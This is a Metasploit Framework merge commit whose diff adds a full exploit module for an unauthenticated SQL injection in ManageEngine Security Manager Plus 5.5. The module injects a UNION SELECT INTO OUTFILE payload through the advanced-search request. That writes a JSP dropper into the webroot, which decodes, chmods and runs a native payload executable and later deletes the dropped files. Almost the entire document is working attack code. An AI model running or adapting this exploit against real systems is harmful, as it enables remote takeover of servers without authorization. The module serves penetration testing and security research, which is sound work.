Merge branch 'manage_engine_sqli' of git://github.com/wchen-r7/metasploit-framework into wchen-r7-manage_engine_sqli

sinn3r · sinn3r · commit 4e6b5393c574 · 2012-10-27T18:53:47.000-05:00
diff --git a/modules/exploits/multi/http/manageengine_search_sqli.rb b/modules/exploits/multi/http/manageengine_search_sqli.rb
@@ -0,0 +1,272 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+#   http://metasploit.com/framework/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+	Rank = ExcellentRanking
+
+	include Msf::Exploit::Remote::HttpClient
+	include Msf::Exploit::EXE
+
+	def initialize(info={})
+		super(update_info(info,
+			'Name'           => "ManageEngine Security Manager Plus 5.5 build 5505 SQL Injection",
+			'Description'    => %q{
+					This module exploits a SQL injection found in ManageEngine Security Manager Plus
+				advanced search page, which results in remote code execution under the context of
+				SYSTEM in Windows; or as the user in Linux.  Authentication is not required in order
+				to exploit this vulnerability.
+			},
+			'License'        => MSF_LICENSE,
+			'Author'         =>
+				[
+					'xistence <xistence[at]0x90.nl>',  # Discovery & Metasploit module
+					'sinn3r',                          # Improved Metasploit module
+					'egypt'                            # Improved Metasploit module
+				],
+			'References'     =>
+				[
+					['EDB','22094'],
+					['BID', '56138']
+				],
+			'Platform'       => ['win', 'linux'],
+			'Targets'        =>
+				[
+					['Automatic', {}],
+					['Windows',   { 'Arch' => ARCH_X86, 'Platform' => 'win'   }],
+					['Linux',     { 'Arch' => ARCH_X86, 'Platform' => 'linux' }]
+				],
+			'DefaultTarget'  => 0,
+			'Privileged'     => false,
+			'DisclosureDate' => "Oct 18 2012"))
+
+		register_options(
+			[
+				OptPort.new('RPORT', [true, 'The target port', 6262])
+			], self.class)
+	end
+
+
+	def check
+		res = sqli_exec(Rex::Text.rand_text_alpha(1))
+
+		if res and res.body =~ /Error during search/
+			return Exploit::CheckCode::Appears
+		else
+			return Exploit::CheckCode::Safe
+		end
+	end
+
+
+	def pick_target
+		return target if target.name != 'Automatic'
+
+		rnd_num   = Rex::Text.rand_text_numeric(1)
+		rnd_fname = Rex::Text.rand_text_alpha(5) + ".txt"
+		outpath   = "../../webapps/SecurityManager/#{rnd_fname}"
+
+		@clean_ups << outpath
+
+		sqli  = "#{rnd_num})) union select @@version,"
+		sqli << (2..28).map {|e| e} * ","
+		sqli << " into outfile \"#{outpath}\" FROM mysql.user WHERE #{rnd_num}=((#{rnd_num}"
+		sqli_exec(sqli)
+
+		res = send_request_raw({'uri'=>"/#{rnd_fname}"})
+
+		# What @@version returns:
+		# Linux   = 5.0.36-enterprise
+		# Windows = 5.0.36-enterprise-nt
+
+		if res and res.body =~ /\d\.\d\.\d\d\-enterprise\-nt/
+			print_status("#{rhost}:#{rport} - Target selected: #{targets[1].name}")
+			return targets[1]  # Windows target
+		elsif res and res.body =~ /\d\.\d\.\d\d\-enterprise/
+			print_status("#{rhost}:#{rport} - Target selected: #{targets[2].name}")
+			return targets[2]
+		end
+
+		return nil
+	end
+
+
+	#
+	# We're in SecurityManager/bin at this point
+	#
+	def on_new_session(cli)
+		if target['Platform'] == 'linux'
+			print_warning("Malicious executable is removed during payload execution")
+		end
+
+		if cli.type == 'meterpreter'
+			cli.core.use("stdapi") if not cli.ext.aliases.include?("stdapi")
+		end
+
+		@clean_ups.each { |f|
+			base = File.basename(f)
+			f = "../webapps/SecurityManager/#{base}"
+			print_warning("#{rhost}:#{rport} - Deleting: \"#{base}\"")
+
+			begin
+				if cli.type == 'meterpreter'
+					cli.fs.file.rm(f)
+				else
+					del_cmd = (@my_target['Platform'] == 'linux') ? 'rm' : 'del'
+					f = f.gsub(/\//, '\\') if @my_target['Platform'] == 'win'
+					cli.shell_command_token("#{del_cmd} \"#{f}\"")
+				end
+
+				print_good("#{rhost}:#{rport} - \"#{base}\" deleted")
+			rescue ::Exception => e
+				print_error("Unable to delete: #{e.message}")
+			end
+		}
+	end
+
+
+	#
+	# Embeds our executable in JSP
+	#
+	def generate_jsp_payload
+		opts                = {:arch => @my_target.arch, :platform => @my_target.platform}
+		native_payload      = Rex::Text.encode_base64(generate_payload_exe(opts))
+		native_payload_name = Rex::Text.rand_text_alpha(rand(6)+3)
+		ext                 = (@my_target['Platform'] == 'win') ? '.exe' : '.bin'
+
+		var_raw     = Rex::Text.rand_text_alpha(rand(8) + 3)
+		var_ostream = Rex::Text.rand_text_alpha(rand(8) + 3)
+		var_buf     = Rex::Text.rand_text_alpha(rand(8) + 3)
+		var_decoder = Rex::Text.rand_text_alpha(rand(8) + 3)
+		var_tmp     = Rex::Text.rand_text_alpha(rand(8) + 3)
+		var_path    = Rex::Text.rand_text_alpha(rand(8) + 3)
+		var_proc2   = Rex::Text.rand_text_alpha(rand(8) + 3)
+
+		if @my_target['Platform'] == 'linux'
+			var_proc1 = Rex::Text.rand_text_alpha(rand(8) + 3)
+			chmod = %Q|
+			Process #{var_proc1} = Runtime.getRuntime().exec("chmod 777 " + #{var_path});
+			Thread.sleep(200);
+			|
+
+			var_proc3 = Rex::Text.rand_text_alpha(rand(8) + 3)
+			cleanup = %Q|
+			Thread.sleep(200);
+			Process #{var_proc3} = Runtime.getRuntime().exec("rm " + #{var_path});
+			|
+		else
+			chmod   = ''
+			cleanup = ''
+		end
+
+		jsp = %Q|
+		<%@page import="java.io.*"%>
+		<%@page import="sun.misc.BASE64Decoder"%>
+
+		<%
+		byte[] #{var_raw} = null;
+		BufferedOutputStream #{var_ostream} = null;
+		try {
+			String #{var_buf} = "#{native_payload}";
+
+			BASE64Decoder #{var_decoder} = new BASE64Decoder();
+			#{var_raw} = #{var_decoder}.decodeBuffer(#{var_buf}.toString());
+
+			File #{var_tmp} = File.createTempFile("#{native_payload_name}", "#{ext}");
+			String #{var_path} = #{var_tmp}.getAbsolutePath();
+
+			#{var_ostream} = new BufferedOutputStream(new FileOutputStream(#{var_path}));
+			#{var_ostream}.write(#{var_raw});
+			#{var_ostream}.close();
+			#{chmod}
+			Process #{var_proc2} = Runtime.getRuntime().exec(#{var_path});
+			#{cleanup}
+		} catch (Exception e) {
+		}
+		%>
+		|
+
+		jsp = jsp.gsub(/\n/, '')
+		jsp = jsp.gsub(/\t/, '')
+
+		jsp.unpack("H*")[0]
+	end
+
+	def sqli_exec(sqli_string)
+		cookie  = 'STATE_COOKIE=&'
+		cookie << 'SecurityManager/ID/174/HomePageSubDAC_LIST/223/SecurityManager_CONTENTAREA_LIST/226/MainDAC_LIST/166&'
+		cookie << 'MainTabs/ID/167/_PV/174/selectedView/Home&'
+		cookie << 'Home/ID/166/PDCA/MainDAC/_PV/174&'
+		cookie << 'HomePageSub/ID/226/PDCA/SecurityManager_CONTENTAREA/_PV/166&'
+		cookie << 'HomePageSubTab/ID/225/_PV/226/selectedView/HomePageSecurity&'
+		cookie << 'HomePageSecurity/ID/223/PDCA/HomePageSubDAC/_PV/226&'
+		cookie << '_REQS/_RVID/SecurityManager/_TIME/31337; '
+		cookie << '2RequestsshowThreadedReq=showThreadedReqshow; '
+		cookie << '2RequestshideThreadedReq=hideThreadedReqhide;'
+
+		state_id = Rex::Text.rand_text_numeric(5)
+
+		send_request_cgi({
+			'method'    => 'POST',
+			'uri'       => "/STATE_ID/#{state_id}/jsp/xmlhttp/persistence.jsp",
+			'headers'   => {
+				'Cookie' => cookie,
+				'Accept-Encoding' => 'identity'
+			},
+			'vars_get'  => {
+				'reqType'    =>'AdvanceSearch',
+				'SUBREQUEST' =>'XMLHTTP'
+			},
+			'vars_post' => {
+				'ANDOR'       => 'and',
+				'condition_1' => 'OpenPorts@PORT',
+				'operator_1'  => 'IN',
+				'value_1'     => sqli_string,
+				'COUNT'       => '1'
+			}
+		})
+	end
+
+	#
+	# Run the actual exploit
+	#
+	def inject_exec(out)
+		hex_jsp = generate_jsp_payload
+		rnd_num = Rex::Text.rand_text_numeric(1)
+		sqli  = "#{rnd_num})) union select 0x#{hex_jsp},"
+		sqli << (2..28).map {|e| e} * ","
+		sqli << " into outfile \"#{out}\" FROM mysql.user WHERE #{rnd_num}=((#{rnd_num}"
+
+		print_status("#{rhost}:#{rport} - Trying SQL injection...")
+		sqli_exec(sqli)
+
+		fname = "/#{File.basename(out)}"
+		print_status("#{rhost}:#{rport} - Requesting #{fname}")
+		send_request_raw({'uri' => fname})
+
+		handler
+	end
+
+
+	def exploit
+		# This is used to collect files we want to delete later
+		@clean_ups = []
+
+		@my_target = pick_target
+		if @my_target.nil?
+			print_error("#{rhost}:#{rport} - Unable to select a target, we must bail.")
+			return
+		end
+
+		jsp_name  = rand_text_alpha(rand(6)+3)
+		outpath   = "../../webapps/SecurityManager/#{jsp_name + '.jsp'}"
+
+		@clean_ups << outpath
+
+		inject_exec(outpath)
+	end
+end
